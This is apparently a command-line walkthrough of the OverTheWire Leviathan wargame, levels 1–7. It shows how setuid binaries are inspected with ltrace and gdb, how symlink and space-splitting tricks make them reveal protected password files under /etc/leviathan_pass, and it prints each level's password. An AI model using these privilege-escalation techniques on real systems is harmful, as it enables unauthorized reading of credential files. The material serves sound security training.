level 1:
ls -la
total 24
drwxr-xr-x   3 root       root       4096 Apr  3 15:19 .
drwxr-xr-x 150 root       root       4096 Apr  3 15:20 ..
drwxr-x---   2 leviathan1 leviathan0 4096 Apr  3 15:19 .backup
-rw-r--r--   1 root       root        220 Mar 31  2024 .bash_logout
-rw-r--r--   1 root       root       3851 Apr  3 15:10 .bashrc
-rw-r--r--   1 root       root        807 Mar 31  2024 .profile
cd .backup/
ls -la
total 140
drwxr-x--- 2 leviathan1 leviathan0   4096 Apr  3 15:19 .
drwxr-xr-x 3 root       root         4096 Apr  3 15:19 ..
-rw-r----- 1 leviathan1 leviathan0 133259 Apr  3 15:19 bookmarks.html
cat bookmarks.html | grep pass
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for leviathan1 is 3QJ3TgzHDq" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to leviathan1</A>

level 2:
ls -l
total 16
-r-sr-x--- 1 leviathan2 leviathan1 15088 Apr  3 15:19 check
file check
check: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=5222b367f5b1ff23a8b2d18696bf508c8c8c0e82, for GNU/Linux 3.2.0, not stripped
ltrace ./check
__libc_start_main(0x80490ed, 1, 0xffffd474, 0 <unfinished ...>
printf("password: ")                                                = 10
getchar(0, 0, 0x786573, 0x646f67password: yyyy
)                                   = 121
getchar(0, 121, 0x786573, 0x646f67)                                 = 121
getchar(0, 0x7979, 0x786573, 0x646f67)                              = 121
strcmp("yyy", "sex")                                                = 1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                                = 29
+++ exited (status 0) +++
./check
password: sex
$ cat /etc/leviathan_pass/leviathan2
NsN1HwFoyN

level 3:
ls -l
total 16
-r-sr-x--- 1 leviathan3 leviathan2 15076 Apr  3 15:19 printfile
./printfile
*** File Printer ***
Usage: ./printfile filename
./printfile /etc/leviathan_pass/leviathan3
You cant have that file...
./printfile .bash_logout
# ~/.bash_logout: executed by bash(1) when login shell exits. ... etc...
./printfile .bash_logout .bashrc
__libc_start_main(0x80490ed, 3, 0xffffd454, 0 <unfinished ...>
access(".bash_logout", 4)                                           = 0
snprintf("/bin/cat .bash_logout", 511, "/bin/cat %s", ".bash_logout") = 21
geteuid()                                                           = 12002
geteuid()                                                           = 12002
setreuid(12002, 12002)                                              = 0
system("/bin/cat .bash_logout"# ~/.bash_logout: executed by bash(1) when login shell exits.
.... etc ...
echo test123 > /tmp/levitest/'my test.txt'
./printfile /tmp/levitest/my\ test.txt
/bin/cat: /tmp/levitest/my: No such file or directory
/bin/cat: test.txt: No such file or directory
ln -s /etc/leviathan_pass/leviathan3 /tmp/levitest/my
ls -l /tmp/levitest
total 4
lrwxrwxrwx 1 leviathan2 leviathan2 30 May 26 08:42 my -> /etc/leviathan_pass/leviathan3
-rw-rw-r-- 1 leviathan2 leviathan2  8 May 26 08:41 my test.txt
./printfile /tmp/levitest/my\ test.txt
f0n8h2iWLP
/bin/cat: test.txt: No such file or directory

level 4:
ls -l
total 20
-r-sr-x--- 1 leviathan4 leviathan3 18100 Apr  3 15:19 level3
ltrace ./level3
__libc_start_main(0x80490ed, 1, 0xffffd474, 0 <unfinished ...>
strcmp("h0no33", "kakaka")                                          = -1
printf("Enter the password> ")                                      = 20
fgets(Enter the password> sesese
"sesese\n", 256, 0xf7fab5c0)                                  = 0xffffd24c
strcmp("sesese\n", "snlprintf\n")                                   = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
)                                          = 19
+++ exited (status 0) +++
 ./level3
Enter the password> snlprintf
[You've got shell]!
$ ls
level3
$ cat /etc/leviathan_pass/leviathan4
WG1egElCvO
$ exit

level 5:
ls -l
total 0
ls -la
total 24
drwxr-xr-x   3 root root       4096 Apr  3 15:19 .
drwxr-xr-x 150 root root       4096 Apr  3 15:20 ..
-rw-r--r--   1 root root        220 Mar 31  2024 .bash_logout
-rw-r--r--   1 root root       3851 Apr  3 15:10 .bashrc
-rw-r--r--   1 root root        807 Mar 31  2024 .profile
dr-xr-x---   2 root leviathan4 4096 Apr  3 15:19 .trash
cd .trash/
trash$ ls -la
total 24
dr-xr-x--- 2 root       leviathan4  4096 Apr  3 15:19 .
drwxr-xr-x 3 root       root        4096 Apr  3 15:19 ..
-r-sr-x--- 1 leviathan5 leviathan4 14944 Apr  3 15:19 bin
file bin
bin: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=da2bc992d78bb31f01fa19c9fd0e6d02c042a757, for GNU/Linux 3.2.0, not stripped
./bin
00110000 01100100 01111001 01111000 01010100 00110111 01000110 00110100 01010001 01000100 00001010
python3
bin_pass = '00110000 01100100 01111001 01111000 01010100 00110111 01000110 00110100 01010001 01000100 00001010'
>>> bin_pass = bin_pass.split(' ')
>>> password = []
>>> for ch in bin_pass:
...     password.append(chr(int(ch,2)))
...
>>> print("".join(password))
0dyxT7F4QD

level 6:
ls
leviathan5
./leviathan5
Cannot find /tmp/file.log
echo test123 > /tmp/file.log
./leviathan5
test123
ls -l
total 16
-r-sr-x--- 1 leviathan6 leviathan5 15148 Apr  3 15:19 leviathan5
ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log
./leviathan5
szo7HDB88w

level 7:
 ls -l
total 16
-r-sr-x--- 1 leviathan7 leviathan6 15040 Apr  3 15:19 leviathan6
 ./leviathan6
usage: ./leviathan6 <4 digit code>
./leviathan6 7777
Wrong
ltrace ./leviathan6 7777
__libc_start_main(0x80490dd, 2, 0xffffd464, 0 <unfinished ...>
atoi(0xffffd5d3, 0, 0, 0)                                           = 7777
puts("Wrong"Wrong
)                                                       = 6
+++ exited (status 0) +++
gdb --args ./leviathan6 9999
gdb run 
gdb disassemble main
  0x080491da <+20>:    movl   $0x1bd3,-0xc(%ebp)
...
  0x0804921a <+84>:    cmp    %eax,-0xc(%ebp)
  0x0804921d <+87>:    jne    0x804924a <main+132>
...
  0x0804924a <+132>:   sub    $0xc,%esp
...
  0x08049262 <+156>:   pop    %ecx
  0x08049268 <+162>:   ret
we can calculate that 1bd3 is 7123
./leviathan6 7123
$ cat /etc/leviathan_pass/leviathan7
qEs5Io5yM8
